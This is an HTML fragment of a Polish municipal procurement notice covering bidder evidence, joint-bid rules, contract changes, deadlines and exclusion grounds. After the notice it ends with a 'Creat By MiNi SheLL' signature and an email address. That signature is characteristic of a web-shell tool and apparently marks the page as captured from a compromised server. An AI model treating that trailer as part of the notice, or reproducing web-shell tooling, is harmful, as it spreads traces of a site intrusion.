udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu Wykonawca składa:<br/>1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów (jeżeli dotyczy).<br/>Szczegółowe wymagania dot. treści oświadczenia zostały wskazane w Rozdziale 12 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W Formularzu oferty należy wskazać nazwy wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z postępowania na podstawie art. 108 ust.1 ustawy Pzp oraz art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia<br/>2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz. U. 2024 poz. 507) natomiast spełnianie warunków udziału w postępowaniu<br/>Wykonawcy wykazują zgodnie z ust. 9.2. SWZ.<br/>4. Oświadczenie, o którym mowa w Rozdziale 10 ust. 10.1. SWZ składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenie to potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia<br/>w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do<br/>wykluczenia. Oświadczenie Wykonawców wspólnie ubiegających się zamówienie winno być złożone wraz z Formularzem<br/>oferty.<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej,<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują<br/>w Formularzu oferty w pkt. 5, które usługi wykonają poszczególni Wykonawcy.<br/>8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na wezwanie Zamawiającego, zobowiązani są złożyć<br/>podmiotowe środki dowodowe, o których mowa w Rozdziale 10 ust. 10.3. SWZ, przy czym podmiotowe środki dowodowe, o<br/>których mowa:<br/>• w pkt. 10.3.1. SWZ składa każdy z Wykonawców wspólnie ubiegających się<br/>o udzielnie zamówienia,<br/>• w pkt. 10.3.2. SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku<br/>9. W przypadku wykonawców występujących wspólnie warunki udziału w postępowaniu określone w Rozdziale 9 ust. 9.2.<br/>SWZ zostaną spełnione, jeżeli:<br/>• co najmniej jeden z Wykonawców będzie dysponował osobą zdolną do wykonania zamówienia, o której mowa w Rozdziale<br/>9 ust. 2 pkt. 4) niniejszej SWZ (w zakresie danej części zamówienia).<br/>W przypadku, gdy wykonawca składa ofertę na więcej niż jedną część zamówienia, liczbę pracowników przewidzianych do<br/>realizacji usługi należy zsumować.<br/>10. Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za<br/>wykonanie umowy.<br/>11. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający<br/>może na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków<br/>dowodowych aktualnych na dzień ich złożenia.<br/>12. Podmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do reprezentowania,<br/>sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia wskazany jest w § 11 Projektu Umowy, stanowiącym Załącznik nr 4 do SWZ,<br/>2. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-31 08:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miasto-siedlce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-31 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-01</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że wykluczy z udziału w postepowaniu Wykonawcę, wobec którego zachodzi co najmniej jedna z<br/>przesłanek określonych w w art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2024 poz.<br/>507).

Creat By MiNi SheLL
Email: jattceo@gmail.com